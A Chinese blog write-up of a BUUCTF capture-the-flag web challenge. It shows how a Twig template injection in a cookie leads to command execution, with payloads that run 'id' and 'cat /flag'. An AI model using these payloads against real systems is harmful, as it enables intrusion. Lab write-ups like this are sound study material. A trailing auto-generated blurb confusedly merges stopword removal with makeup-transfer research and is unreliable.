buuctf web cookie is so subtle

题目给出了hint,这题的主要利用方法在cookie里,在页面里的hint.php也让我们看看cookie
提交一个1,发现cookie里多了一个user=1
尝试user=admin,没用,直接回显。Hello,admin
考虑一下模板注入{{7*7}},回显,hello,49
到这这题就基本上结束了,查询到后端技术是PHP,查询了一下,php模板框架,常用的两种smarty或者twig
尝试{{$smarty.version}},失败,尝试twig注入的时候,发现成功回显
payload:{{_self.env.registerUndefinedFilterCallback(“exec”)}}{{_self.env.getFilter(“id”)}}
借鉴https://cloud.tencent.com/developer/article/1516336
https://xz.aliyun.com/t/7518#toc-5
成功拿到flag
payload:{{_self.env.registerUndefinedFilterCallback(“exec”)}}{{_self.env.getFilter(“cat /flag”)}}
参考视频链接:https://www.bilibili.com/video/BV1ia411k7JS/

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
引用中的函数rm_custom_stops是一个自定义的停用词移除函数,它接受一个字符串句子作为参数,并返回一个清理后的句子作为单词列表。在这个函数中,定义了一个包含需要移除的停用词的集合stop_words,然后通过列表推导式去除句子中的停用词,最终返回一个不包含停用词的单词列表。 引用和提到了一个网络,该网络可以实现化妆的迁移和卸妆。与之前的方法不同,这个网络能够同时处理化妆迁移和卸妆。此外,统一的训练过程能够考虑不同区域妆彩之间的关系,并且端对端网络本身能够学习源图像中输入妆彩的适应性,从而避免了后期处理的需要。中的rm_custom_stops函数来去除句子中的停用词。这样可以在保留句子的语义的同时,去除一些常见的无意义单词,使句子更加精炼。然后,你可以使用引用和中提到的网络来进行化妆的迁移和卸妆。这个网络不仅可以迁移不同的化妆效果,还能够同时实现卸妆功能,而且它的训练过程还能够考虑不同区域妆彩之间的关系,从而得到更好的效果。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [【自然语言处理】情感分析(一):基于 NLTK 的 Naive Bayes 实现](https://blog.csdn.net/be_racle/article/details/128761017)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 50%"] - *2* *3* [BeautyGAN论文翻译](https://blog.csdn.net/Leytton/article/details/102932180)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值